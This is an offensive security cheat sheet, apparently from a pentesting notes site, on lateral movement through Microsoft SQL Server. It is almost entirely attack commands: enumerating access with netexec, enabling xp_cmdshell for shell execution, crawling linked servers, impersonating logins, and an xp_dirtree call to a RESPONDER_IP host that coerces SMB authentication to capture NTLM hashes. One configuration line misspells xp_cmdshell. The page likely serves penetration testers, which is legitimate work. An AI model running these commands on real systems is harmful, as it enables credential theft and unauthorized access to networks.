MSSQL Lateral Movement

Tools: CrackMapExec/Netexec , impacket-mssqlclient

netexec mssql IP -u USER -p PASSWORD -d DOMAIN (Find mssql access)

MATCH p=(u:User)-[:SQLAdmin]->(c:Computer) RETURN p (Users with SQL Admin bloodhound cypher query)

Trust Link

1) Metasploit

use exploit/windows/mssql/mssql_linkcrawler

2) Powershell MSSQL Module

Get-SQLServerLinkCrawl -username USERNAME -password PASSWORD -Verbose -Instance SQL_INSTANCE -Query "SQL_QUERY"

3) impacket-mssqlclient

impacket-mssqlclient -windows-auth DOMAIN/USER:PASSWORD@IP

enum_db

enable xp_cmdshell --> xp_cmdshell COMMAND (Gives low access shell)

EXEC MASTER.sys.xp_dirtree '\\RESPONDER_IP\test', 1, 1 (Coerce SMB. NTLM Hash Capture)

trustlink --> sp_linkedservers --> use_link (MSSQL Lateral Movement)

enum_impersonate --> exec_as_user USER

enum_impersonate --> exec_as_login LOGIN

4) MSSQL Client shell

EXECUTE sp_configure 'show advanced options',1; RECONFIGURE;

EXECUTE sp_configure 'xp_cmdhsell',1; RECONFIGURE;

EXEC xp_cmdshell 'COMMAND' (Gains low access shell)

PreviousLocal User Lateral Movement NextPowershell Object Credential Creation

Last updated 4 months ago

hashtagTools: CrackMapExec/Netexec , impacket-mssqlclient

hashtagTrust Link

hashtag1) Metasploit

hashtag2) Powershell MSSQL Module

hashtag3) impacket-mssqlclient

hashtagCommands upon login:

hashtag4) MSSQL Client shell

Tools: CrackMapExec/Netexec , impacket-mssqlclient

Trust Link

1) Metasploit

2) Powershell MSSQL Module

3) impacket-mssqlclient

Commands upon login:

4) MSSQL Client shell